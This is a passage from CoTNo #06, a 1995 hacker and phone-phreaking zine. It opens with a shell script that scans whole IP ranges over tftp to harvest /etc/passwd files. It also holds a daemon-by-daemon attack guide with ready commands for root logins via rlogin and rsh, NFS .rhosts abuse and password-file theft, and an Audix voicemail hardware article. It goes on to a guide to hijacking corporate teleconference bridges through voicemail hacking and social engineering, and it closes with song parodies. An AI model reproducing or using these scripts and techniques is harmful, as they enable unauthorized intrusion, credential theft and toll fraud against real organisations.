echo " The [hostname] can be specialized in fully qualified domain name "
|
|||
|
echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
|
|||
|
echo " as well as IP with -ip option. "
|
|||
|
exit 1
|
|||
|
;;
|
|||
|
-ip)
|
|||
|
if [ $2x = x ]; then
|
|||
|
echo " Usage: $0 $1 the IP "
|
|||
|
exit 1
|
|||
|
else
|
|||
|
x=`echo $2 | cut -d. -f1`
|
|||
|
xx=`echo $2 | cut -d. -f2`
|
|||
|
xxx=`echo $2 | cut -d. -f3`
|
|||
|
xxxx=`echo $2 | cut -d. -f4`
|
|||
|
# ^ field delimiter is '.' -- get field 1/2/3/4
|
|||
|
fi;;
|
|||
|
*)
|
|||
|
if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
|
|||
|
# -x is for SunOs
|
|||
|
echo sorry dude, no nslookup server .. try it with -ip option.
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
|
|||
|
# ^ 7 chars ^ last line
|
|||
|
if [ "$x1" = '' ]; then
|
|||
|
echo " There is no such domain. Nothing to scan. Exit. "
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ###
|
|||
|
xx=`echo $x1 | cut -d. -f2` # get the second set
|
|||
|
xxx=0 # ignore the rest, if any
|
|||
|
xxxx=0
|
|||
|
;;
|
|||
|
esac
|
|||
|
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
|
|||
|
echo There is no such domain. Nothing to scan.
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
while [ $x -ne 255 ]; do
|
|||
|
|
|||
|
while [ $xx -ne 255 ]; do
|
|||
|
while [ $xxx -ne 255 ]; do
|
|||
|
while [ $xxxx -ne 255 ]; do
|
|||
|
target=$x.$xx.$xxx.$xxxx
|
|||
|
trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
|
|||
|
tftp << EOF
|
|||
|
c $target
|
|||
|
mode ascii
|
|||
|
trace
|
|||
|
get /etc/passwd passwd.$target
|
|||
|
quit
|
|||
|
EOF
|
|||
|
if [ ! -s passwd.$target ] ; then
|
|||
|
rm -rf passwd.$target
|
|||
|
echo `date` $target has rejected an attempt >> .info
|
|||
|
else
|
|||
|
mv passwd.$target .good.$target
|
|||
|
echo `date` $target is taken, all data is stored in .good.$target file >> .info
|
|||
|
fi
|
|||
|
xxxx=`expr $xxxx + 1 `
|
|||
|
done
|
|||
|
xxxx=0
|
|||
|
xxx=`expr $xxx + 1 `
|
|||
|
done
|
|||
|
xxx=0
|
|||
|
xx=`expr $xx + 1 `
|
|||
|
done
|
|||
|
xx=0
|
|||
|
x=`expr $x + 1 `
|
|||
|
done
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> finger 79 Finger
|
|||
|
|
|||
|
The finger command displays information about another user, such as login
|
|||
|
name, full name, terminal name, idle time, login time, and location if
|
|||
|
known. finger requests are answered by the fingerd daemon.
|
|||
|
|
|||
|
Robert Tappan Morris's Internet Worm used the finger daemon. The finger
|
|||
|
daemon allowed up to 512 bytes from the remote machine as part of the
|
|||
|
finger request. fingerd, however, suffered from a buffer overflow bug
|
|||
|
caused by a lack proper bounds checking. Anything over 512 got
|
|||
|
interpreted by the machine being fingered as an instruction to be
|
|||
|
executed locally, with whatever privileges the finger daemon had.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> www-http 80 World Wide Web HTTP
|
|||
|
|
|||
|
HTML (HyperText Markup Language) allows web page user to execute
|
|||
|
programs on the host system. If the web page designer allows the web
|
|||
|
page user to enter arguments to the commands, the system is vulnerable
|
|||
|
to the usual problems associated with system() type calls. In addition,
|
|||
|
there is a vulnerability that under some circumstances will give you an
|
|||
|
X-Term using the UID that the WWW server is running under.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> sunrpc 111 SUN Remote Procedure Call
|
|||
|
|
|||
|
Sun RPC (Remote Procedure Call) allows users to execute procedures on
|
|||
|
remote hosts. RPC has suffered from a lack of secure authentification.
|
|||
|
To exploit RPC vulnerabilities, you should have a program called "ont"
|
|||
|
which is not terribly difficult to find.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> login 513 Remote login
|
|||
|
|
|||
|
Some versions of AIX and Linux suffer from a bug in the way that
|
|||
|
rlogind reads arguments. To exploit this vulnerability, issue this
|
|||
|
command from a remote system:
|
|||
|
|
|||
|
rlogin host -l -froot
|
|||
|
|
|||
|
Where host is the name of the target machine and username is the username
|
|||
|
you would like to rlogin as (usully root). If this bug exists on the
|
|||
|
hosts system, you will be logged in, without being asked for a password.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> rsh-spx 222 Berkeley rshd with SPX auth
|
|||
|
|
|||
|
Some versions of Dynix and Irix have a bug in rshd that allows you to
|
|||
|
run commands as root. To exploit this vulnerability, issue this command
|
|||
|
from the remote system:
|
|||
|
|
|||
|
rsh host -l "" /bin/sh
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> netinfo 716-719 NetInfo
|
|||
|
|
|||
|
NeXT has implemented a protocol known as NetInfo so that one NeXT
|
|||
|
machine can query another NeXT machine for information. A NetInfo
|
|||
|
server will by default allow unrestricted access to system databases.
|
|||
|
This can be fixed by the System Administrator. One of the pieces of
|
|||
|
information netinfo will give up is the password file.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> ibm-res 1405 IBM Remote Execution Starter
|
|||
|
|
|||
|
rexd (the remote execution daemon) allows you to execute a program on
|
|||
|
another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered
|
|||
|
from a vulnerability allowing unintended remote execution. The rexd
|
|||
|
daemon checks your uid on the machine you are coming from, therefore you
|
|||
|
must be root on the machine you are mounting the rexd attack from. To
|
|||
|
determine if your target machine is running rexd, use the 'rcp -p
|
|||
|
<target>' command. You will also need the exploit program known as 'on'
|
|||
|
which is available on fine H/P boards everywhere.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> nfs 2049 Network File System
|
|||
|
|
|||
|
NFS, the Network File System, from Sun Microsystems has suffered from
|
|||
|
multiple security vulnerabilities. In addition, many system
|
|||
|
administrators configure NFS incorrectly, allowing unintended remote
|
|||
|
access.
|
|||
|
|
|||
|
Using the command 'showmount -e <target>' you can view what file systems
|
|||
|
are exported from a machine. Many administrators allow read access to
|
|||
|
the /etc directory, allowing you to copy the password file. Other
|
|||
|
administrators allow write access to user directories, allowing you to
|
|||
|
create .rhosts files and gain access to the machine via rlogin or rsh.
|
|||
|
|
|||
|
In addition to configuration issues, NFS is vulnerable to attacks using
|
|||
|
a uid masking bug, a mknod bug, and a general file handle guessing
|
|||
|
attack. Several hacked versions of the mount command have been written
|
|||
|
to exploit known vulnerabilities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> x11 6000-6063 X Window System
|
|||
|
|
|||
|
X-Windows has suffered and currently suffers from numerous
|
|||
|
vulnerabilities. One vulnerability allows you to access another users
|
|||
|
display, another allows you to view another users keystrokes. Another
|
|||
|
vulnerability allows a remote attacker to run every program that the
|
|||
|
root user starts in his or her .xsession file. Yet another X-Windows
|
|||
|
vulnerability allows a local user to create a root entry in the
|
|||
|
/etc/passwd file.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> rcp
|
|||
|
|
|||
|
The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
|
|||
|
in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be
|
|||
|
running NFS (Network File System) on a Unix system or PC/NFS on a DOS
|
|||
|
system.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> NIS
|
|||
|
|
|||
|
Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
|
|||
|
has a vulnerability where you can request an NIS map from another NIS
|
|||
|
domain if you know the NIS domain name of the target system. There is
|
|||
|
no way to query a remote system for it's NIS domainname, but many NIS
|
|||
|
domain names are easily guessable. The most popular NIS map to request
|
|||
|
is passwd.byname, the NIS implementation of /etc/passwd. In addition,
|
|||
|
if you have access to a diskless Unix workstation, you can determine the
|
|||
|
NIS domain name of the server it boots from.
|
|||
|
|
|||
|
+--------------------------------------------------------+
|
|||
|
+ Do not confuse NIS domain names with DNS domain names! |
|
|||
|
+--------------------------------------------------------+
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> Other attacks
|
|||
|
|
|||
|
In addition to these daemon based attacks, many other methods can be
|
|||
|
used to gain access to a remote computer. These include, but are not
|
|||
|
limited to: default accounts, password guessing, sniffing, source
|
|||
|
routing, DNS routing attacks, tcp sequence prediction and uucp
|
|||
|
configuration exploits.
|
|||
|
|
|||
|
This should give you an idea on how daemon based attacks function. By
|
|||
|
no means is this a complete list of security vulnerabilities in
|
|||
|
privileged internet daemons. To discover more information about how
|
|||
|
these daemons operate, and how to exploit their vulnerabilities, I
|
|||
|
highly recommend reading source code, man pages and RFC's.
|
|||
|
|
|||
|
|
|||
|
Voyager[TNO]
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
[][][][][][][][][][][][][][][][][][][][][][]
|
|||
|
[[[ ]]]
|
|||
|
[[[[ THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
|
|||
|
[[[[[ ]]]]]
|
|||
|
[[[[[[[ by: Boba Fett ]]]]]]]
|
|||
|
[[[[[[[[[[[ ]]]]]]]]]]]
|
|||
|
[][][][][][][][][][][][][][][][][][][][][][]
|
|||
|
|
|||
|
|
|||
|
- " What?! Another crummy file on the Audix voice mail? "
|
|||
|
|
|||
|
Not exactly. In COTNO #1, you will find a good article on identifying and
|
|||
|
obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
|
|||
|
discuss the physical/electrical design of the Audix System and how it's
|
|||
|
integrated with the Definity switch. I will not discuss how to obtain
|
|||
|
dialups to the audix or hacking it, that's another file :). Most of the
|
|||
|
information and diagrams in this paper where gathered from various sources.
|
|||
|
Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
|
|||
|
representatives. ;)
|
|||
|
|
|||
|
|
|||
|
1) Hardware
|
|||
|
-----------
|
|||
|
|
|||
|
All right, what does this baby look like? Well, all in all, it's quite simple.
|
|||
|
There are 4 major components, all of which can be easily replaced or removed.
|
|||
|
A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
|
|||
|
front panel looks like.
|
|||
|
|
|||
|
|
|||
|
Disk/Alarm board MFB panel
|
|||
|
|
|||
|
.---------------------.__.-----.
|
|||
|
| _______________ | | |
|
|||
|
| | | | | o <----- Red LED
|
|||
|
| | | | | |
|
|||
|
| | ||| | | | O <---------- "Enter/yes" Button
|
|||
|
| | ||| | | | __ |
|
|||
|
Tape ----->| |||| | | | || |
|
|||
|
Unit | | |||| | | | || |
|
|||
|
| | ||| | | | || <----- Alphanumeric liquid
|
|||
|
| | ||| | | | || | crystal display(10 character)
|
|||
|
| | ||| | | | -- |
|
|||
|
| --------------- | | O <---- "Next/no" button
|
|||
|
| | | |
|
|||
|
| | | |
|
|||
|
Boot/ -----------------> O | | O <---- "Back" button
|
|||
|
shutdown | | |Back |
|
|||
|
button | .--------. | | |
|
|||
|
| | Some | | | |
|
|||
|
| | stupid | _ | | _ |
|
|||
|
| | warning| | | | | | <-------------- Handles/
|
|||
|
| | label. | | | | | | | | / latch
|
|||
|
| |________| | <----------------
|
|||
|
.________________|_|__|--|_|_|_|
|
|||
|
|
|||
|
|
|||
|
As you can see, it consists of two boards: The multifunction board (right), and
|
|||
|
the disk/alarm board (left).
|
|||
|
|
|||
|
o MFB major components:
|
|||
|
|
|||
|
- A 386 processor (supports Unix System V) with 16 megs of dynamic
|
|||
|
RAM (DRAM).
|
|||
|
- An array of six 50 mhz digital signal processors (DSPs).
|
|||
|
- The Definity switch time-division multiplexed (TDM) bus interface.
|
|||
|
- An alarm monitoring processor. :(
|
|||
|
|
|||
|
o D/ALB major components:
|
|||
|
|
|||
|
- A tape drive
|
|||
|
- A Hard Drive
|
|||
|
- An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
|
|||
|
|
|||
|
|
|||
|
The modem is included with the package. If the on-board modem does not
|
|||
|
comply with the local telco rules (for example foreign countries) , than
|
|||
|
through the RS-232 port an external one can be attached. Let's take a deeper
|
|||
|
look inside and see where the components go.
|
|||
|
|
|||
|
.--------------------------------------.
|
|||
|
/| + Disk/Alarm Board + |__Tip/Ring
|
|||
|
.--------. / | .------------------remote acs ports--|___RS-232
|
|||
|
| | / | | |
|
|||
|
| | / | | .------|--------|--------Ethernet----- LAN
|
|||
|
|S | / | | | Tape System Disk controller|
|
|||
|
|W | / |_|__|_________________________________|
|
|||
|
|I |/ |-|--|---------------------------------|
|
|||
|
|T|======| | | | + Multifunction Board + |
|
|||
|
|C| Audix| | | | |
|
|||
|
|H|======| | | | /============== RS-232
|
|||
|
| |\ | | SCSI 386 Serial Data Packet |
|
|||
|
|________| \ | | Interface CPU async/sync. bus |--- Packet
|
|||
|
\ | | -|-----------|-------|------inter- | Bus
|
|||
|
\ | | | 16 Meg DMA face |
|
|||
|
\ | Faceplate RAM | \ | |
|
|||
|
\ | & Control | \ TDM |
|
|||
|
\ | 3 DSP 32Cs---Interface|--- TD bus
|
|||
|
\______________________________________|
|
|||
|
|
|||
|
|
|||
|
o Explanation of some terms:
|
|||
|
|
|||
|
CPU: Central Processing Unit
|
|||
|
DSP: Digital Signal Processor
|
|||
|
TDM: Time-Division Multiplexed
|
|||
|
DMA: Direct Memory Access
|
|||
|
SCSI: Small Computer System Interface
|
|||
|
|
|||
|
The Definity Audix VMS is so compact because it has to fit in the Definity
|
|||
|
PBX's port slot. It can: detect a incoming call, detect when the caller has
|
|||
|
disconnected, disconnect a call on ANY port. It can also, disable any port to
|
|||
|
prevent it from receiving incoming calls, and most important of all, it can
|
|||
|
originate outgoing calls. It is also good to know that it has CLID.
|
|||
|
Here's a list of it's functions:
|
|||
|
|
|||
|
- Call History Information (Called Party ID,Calling party ID and
|
|||
|
reason for call).
|
|||
|
- Integrated message waiting notification (LED).
|
|||
|
- Disconnect message (Contact Administrator for help, please disconnect
|
|||
|
goodbye).
|
|||
|
- Message waiting status information (Updated on activity, Audit of
|
|||
|
each vmb and refresh of all vmbs).
|
|||
|
- Maintenance info. for link.
|
|||
|
- Audix control of port. (disconnect call, detect caller, etc..)
|
|||
|
|
|||
|
I've been referring to it as the Definity Audix, and not just Audix. Audix,
|
|||
|
(aka Audix release 1), was first introduced in 1984. The Definity Audix,
|
|||
|
however, was introduced in 1992, and came with a series of more advanced
|
|||
|
features. For example, the time scale modification option was improved, allowing
|
|||
|
the playback of messages at slower or faster speeds. Or the speech
|
|||
|
encoder/decoder algorithm which was changed resulting in better sound quality
|
|||
|
(so they say). How can you tell if it's a Definity when calling it remotely?
|
|||
|
Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
|
|||
|
apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
|
|||
|
tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
|
|||
|
less than half the time. You can time the reaction, and figure out what your
|
|||
|
dealing with, but there are many things that can affect the response time also
|
|||
|
(for example, the amount of people using the voice mail). As you can see
|
|||
|
this method isn't very reliable.
|
|||
|
|
|||
|
2) Software
|
|||
|
-----------
|
|||
|
|
|||
|
The system software resides on a single 160 meg casettee tape. It is loaded
|
|||
|
on the hard disk whenever an installation or upgrade is being performed.
|
|||
|
There is also a big part of the code, which constantly monitors multiple
|
|||
|
thermal sensors on the two circuit packs, making sure that they don't over
|
|||
|
heat.
|
|||
|
|
|||
|
The chick's sweet voice you hear when interacting with the VMS, is composed
|
|||
|
of multiple fragments. A fragment can be a single word, a complete sentence,
|
|||
|
or a bunch of sentences. For example, "Please enter extension and pound sign"
|
|||
|
is most likely to be two fragments. The first being "please enter extension"
|
|||
|
and the second being "and pound sign". Obviously, this is used to save space.
|
|||
|
A second recording is: "Enter password and pound sign", the "and pound sign"
|
|||
|
is the same fragment as in the first one. Since AT&T sells it's Audix system
|
|||
|
in nearly 80 countries, there are a couple of different language tapes also.
|
|||
|
So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
|
|||
|
Currently AT&T offers ten language tapes and the Definity Audix can support
|
|||
|
up to nine different language tapes simultaneously.
|
|||
|
|
|||
|
|
|||
|
"So if it's an Audix voice mail then there's a Definity PBX, right? "
|
|||
|
|
|||
|
Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
|
|||
|
with other switches. Some of the most common are:
|
|||
|
|
|||
|
- G3I - System 25
|
|||
|
- G3S - System 75
|
|||
|
- G3R - System 85
|
|||
|
|
|||
|
I'm not sure about NorTel switches such as the SL-1, some people say yes,
|
|||
|
while others say that only AT&T switches can be integrated with Audix. If
|
|||
|
anyone knows, please let me know. Comments or suggestions are welcome.
|
|||
|
|
|||
|
|
|||
|
- Boba Fett
|
|||
|
|
|||
|
<EOF>
|
|||
|
<05/23/95>
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/\
|
|||
|
\/
|
|||
|
Bridging the Gap
|
|||
|
/\-------------------------/\
|
|||
|
\/-------------------------\/
|
|||
|
Eddie Van Halen
|
|||
|
/\
|
|||
|
\/
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
------------
|
|||
|
First of all I wrote this because for one thing I am SICK AND TIRED of sitting
|
|||
|
on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.
|
|||
|
Then,once they get the k0nPh iNf0, I am forced to constantly hear from the
|
|||
|
k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the
|
|||
|
time but I NEVER call into them. Why? Because these days,they DO suck. It
|
|||
|
seems the underground world have completely forgotten about what use to be
|
|||
|
the best way to conference - BRIDGE's.
|
|||
|
|
|||
|
|
|||
|
ABOUT BRIDGES
|
|||
|
-------------
|
|||
|
I'm sure everyone reading this knows what a bridge is. Whether they know the
|
|||
|
best way to get them is another thing. I do, however, run across the
|
|||
|
occasional irc'er that /msgs me with "whats a bridge?" when I bring up the
|
|||
|
subject.
|
|||
|
|
|||
|
Bridges are just about the same as k0nPhz, except they are usually owned and
|
|||
|
used by big businesses and schools on their own telephone equipment. This
|
|||
|
equipment is usually integrated into their voice mail and/or PBX computers
|
|||
|
and allows the company or school to hold teleconferences without relying on
|
|||
|
the national teleconference providers.
|
|||
|
|
|||
|
For those out there (if any?) that remember the 904-348 bridge, it was a
|
|||
|
System 75 PBX bridge used by a home school, where the students would call in
|
|||
|
in the daytime and take tests and attend classes. The way it was used was as
|
|||
|
follows:
|
|||
|
|
|||
|
You would dial 348-XX00 to 348-XX19. That was ONE of the bridges.
|
|||
|
Anybody that connected to any number from 00 to 19 would be connected
|
|||
|
to the bridge. If two people tried to connect to the same number, it
|
|||
|
would be busy. Thus, it had 20 lines. A second bridge was reached at
|
|||
|
348-XX20 to 348-XX29. This was off the same system, but gave you a
|
|||
|
different bridge with 10 lines. Yet another bridge could be found at
|
|||
|
348-XX30 to 348-XX69 off the same system.
|
|||
|
|
|||
|
You could call in during the daytime and mess with the teachers and kids or
|
|||
|
whatever, but occasionally they would hang you up, or call you back or
|
|||
|
something. This one went down because it wasn't blocked from collect calls,
|
|||
|
and the number got very widespread throughout the k0d3lyN3 and BBS world and
|
|||
|
was constantly collect-called by lamers who didn't know how to phreak. It is,
|
|||
|
however, occasionally up for the students to use, but goes down as soon class
|
|||
|
is over.
|
|||
|
|
|||
|
FINDING A BRIDGE.
|
|||
|
-----------------
|
|||
|
Finding a bridge use to be the easiest thing for me. It used to be, like,
|
|||
|
WHAT I DID. I would put one up on my codeline, and spread it to the others,
|
|||
|
and would call into QSD or Lutz or something about 30 minutes afterward
|
|||
|
and get messages from people who I didn't even know saying "Hey,man,thanx
|
|||
|
for puttin up that bridge!". These days I don't even bother. I don't WANT
|
|||
|
to talk to half these idiots that are around today.
|
|||
|
|
|||
|
Anyway, lets say you want to find a bridge. Go through the phonebook and look
|
|||
|
up the all the big businesses. Call the main numbers that you find after
|
|||
|
hours and find out which ones have voice mail systems. In this article, I
|
|||
|
will focus on the Audix voicemail system made by AT&T so look for those. To
|
|||
|
tell if your target is using Audix, press *8 during the greet, and if it says
|
|||
|
"Enter the four digit extension and pound sign." you have found one. A
|
|||
|
complete guide to hacking Audix voice mail can be found in CoTNo #1,
|
|||
|
article #1. Railroad companies like CSX and AT&T owned companies like
|
|||
|
Transtech, or Card Services often have Audix systems with bridges.
|
|||
|
|
|||
|
Once you have the targeted Audix system,you need to start scanning for the
|
|||
|
system extensions. Hit *6 for the names directory and try entering
|
|||
|
CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to
|
|||
|
the bridge spit out right at you (as with CSX's system),or at least most
|
|||
|
systems have that extension where you hear the person state their name
|
|||
|
"Conference Planning". If this is the case,you need to get a voice mail
|
|||
|
box off the system and send a message to whatever extension Conference
|
|||
|
Planning is saying something like "Yes, I need a conference set up for
|
|||
|
such and such a date & such and such a time". This will more than likely
|
|||
|
work and Conference Planning will respond usually with either "No problem,
|
|||
|
the teleconference bridge is at XXXX" or "All we need is the PIN
|
|||
|
number you want."
|
|||
|
|
|||
|
However, a lot of systems do not have their *6 directory system configured
|
|||
|
very good at all, so you might want to try scanning all the XX00 and XX99
|
|||
|
and find out where all the computer-related extensions are located at.
|
|||
|
Or you might want to social engineer it out of one of the people located
|
|||
|
at an extension. Try calling from within your box and acting like you work
|
|||
|
there.
|
|||
|
|
|||
|
Once you have found what you think is the bridge,you need to test it out
|
|||
|
with a friend. If he calls into the same extension and gets a busy signal,
|
|||
|
you may want tell him to try the next extension up. If the bridge is
|
|||
|
multi-lined, have him figure out how many lines the bridge has and make
|
|||
|
sure the lines are all going to the same bridge and not 3 different
|
|||
|
bridges or something. Note that if you are scanning on a Railroad
|
|||
|
companies system, you will sometimes come to an extension you might think
|
|||
|
is a bridge and end up to be dispatchers. So once you sign on to what you
|
|||
|
believe is the bridge,hit a few dtmf tones and make sure you don't hear
|
|||
|
someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
|
|||
|
|
|||
|
SECURITY ON A BRIDGE.
|
|||
|
---------------------
|
|||
|
Security on a bridge is a lot different than on an alliance or on a k0nPh.
|
|||
|
You usually don't have to worry about it getting cancelled and the bridge
|
|||
|
usually will not ever go down if you don't third-party or collect call to
|
|||
|
it. You are not dealing with the phone company here, you are dealing
|
|||
|
with whatever business owns it, and if they detect a lot of activity on
|
|||
|
the extension, they will usually either warn you to leave by recording the
|
|||
|
conversations and playing them back to you, or just change the extension.
|
|||
|
DO expect to be dealing with the business communication security person,
|
|||
|
though, at one time or another. They will usually talk to you and explain to
|
|||
|
you why they need you to leave, and most of the time I found out, it wasn't
|
|||
|
because of the people using their bridge, it was because of the collect-
|
|||
|
calling, third party billing or the fact that people were using it via the
|
|||
|
800 number and the company was having to pick up the tab. I don't recommend
|
|||
|
finding a bridge and giving it to the entire world because when you are
|
|||
|
not on, you don't know what goes on in the conversation, and if the company
|
|||
|
does finally decide to get it investigated, the investigators seem to go
|
|||
|
after the same thing every time: the source that gave out the bridge in
|
|||
|
the first place.
|
|||
|
|
|||
|
CONCLUSION
|
|||
|
----------
|
|||
|
Hopefully you have learned something from all this. With a little time and
|
|||
|
patience, you can set up a bridge that will last for weeks, maybe months.
|
|||
|
And besides, hacking out a phone system will teach you a lot more than
|
|||
|
than setting up a k0nPh off your neighbor's phone terminal. So next time
|
|||
|
you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
|
|||
|
try hacking one out for a change.
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Elite Music Part V
|
|||
|
- Disk Jockey/WR -
|
|||
|
|
|||
|
|
|||
|
Please note the /WR. Until now I have not been in textfiles at large, only
|
|||
|
a few given to good friends. There have been other `DJ's out there; as many
|
|||
|
as six by my count, so far. So even that my group has had but one member
|
|||
|
for over four years, I keep the tag to distinguish myself.
|
|||
|
|
|||
|
Well, while on a (pretty lame, I must admit) conference with a barrage of
|
|||
|
lame people, sending streams of DTMF tones, long belches, humming, and
|
|||
|
music down the line, I got an idea. At one point the B-52's `Roam' was
|
|||
|
played in the background during a half-intelligent discussion of cellular
|
|||
|
telecommunications. These lyrics almost came to me almost immediately, and
|
|||
|
these are the results. I intend to record this song for real in a few
|
|||
|
months or so; I do have the instrumental of the real song and it would be
|
|||
|
somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
|
|||
|
and by that time these lame people might grow up. (But, I can't ask for
|
|||
|
everything.)
|
|||
|
|
|||
|
"Phone Roam"
|
|||
|
|
|||
|
Roam cyberspace, switching through every carrier
|
|||
|
Oh girl won't you lend me one of those codes
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Around the world, the call flags switchboard lights
|
|||
|
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without codes, without cards
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without anything but an ESN
|
|||
|
|
|||
|
Hit conferences where you'll lose your mind
|
|||
|
Toners and lamers, leave them all behind
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Around the world, the call flags switchboard lights
|
|||
|
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without codes, without cards
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without anything but an ESN
|
|||
|
|
|||
|
Go ahead and roam, go ahead and roam
|
|||
|
|
|||
|
Scan all you can while the Feds trace you
|
|||
|
Hack up PBXs till your hands get tired
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Around the world, the call flags switchboard lights
|
|||
|
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without codes, without cards
|
|||
|
Roam if you want to, roam around the world
|
|||
|
Roam if you want to, without anything but an ESN
|
|||
|
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Take it trunk to trunk, hopping through the satellites
|
|||
|
Go ahead and roam, go ahead and roam
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
End of CoTNo #06
|
|||
|
|
|||
|
I know you expect some snappy ending as usual to another successful issue
|
|||
|
of Communications of The New Order, but considering the grimness of much
|
|||
|
of this issue I don't think it would be appropriate. Despite all of the
|
|||
|
bad news that was presented in this issue, I hope that everyone will
|
|||
|
"keep the faith", as it were. Explore, learn, educate. But don't do
|
|||
|
anything stupid. The powers that be are becoming increasingly intent
|
|||
|
upon stopping those who are labeled as "hackers". And everyday, there
|
|||
|
are more of us for them to stop. Everyday, we are being introduced to
|
|||
|
new technologies that few people understand, and few people want to
|
|||
|
understand. Our desire to understand can be achieved, but we must be
|
|||
|
careful.
|
|||
|
|
|||
|
Even though you just read this issue's Elite Music, I thought I would
|
|||
|
finish off with another song that has special significance to me. This
|
|||
|
showed up in my e-mail the other day and it really made me think. I
|
|||
|
hope it is as meaningful to you as it was for me...
|
|||
|
|
|||
|
|
|||
|
TNO MAN
|
|||
|
-------
|
|||
|
To the Tune of Desperado, by The Eagles
|
|||
|
|
|||
|
|
|||
|
TNO man, why don't you come to your senses?
|
|||
|
You been out jumping' fences into those Bell yards.
|
|||
|
Oh you're a smart one, I know that you got your reasons,
|
|||
|
these things that are pleasin' can hurt you somehow.
|
|||
|
|
|||
|
Don't you hack on those old .mil sites,
|
|||
|
they'll catch you if you're lazy,
|
|||
|
you know diverting twice is always your best bet.
|
|||
|
Now it seems to me some eleet things
|
|||
|
have been shown upon your screen
|
|||
|
but you only want the ones that you can't hack.
|
|||
|
|
|||
|
TNO man, oh you ain't gettin' no younger,
|
|||
|
your hunger for knowledge, it's drivin' you on.
|
|||
|
And hacking, oh hacking, well that's just some people talkin',
|
|||
|
your prison is waitin' at the end of the line.
|
|||
|
|
|||
|
Don't your power get old on the Internet?
|
|||
|
The account won't die and the root won't mind,
|
|||
|
it's hard to tell the night time from the day.
|
|||
|
You're losin' all your highs and lows,
|
|||
|
ain't it funny how the feelin' goes away?
|
|||
|
|
|||
|
TNO man, why don't you come to your senses?
|
|||
|
Come down from your firewalls, open the gateway.
|
|||
|
It may be laming' but there's a job waiting for you.
|
|||
|
You better let somebody hire you LET SOMEBODY HIRE YOU
|
|||
|
you better let somebody hire you before it's too late.
|
|||
|
|
|||
|
- Don Henley, Glenn Frey and the Voyager
|
|||
|
|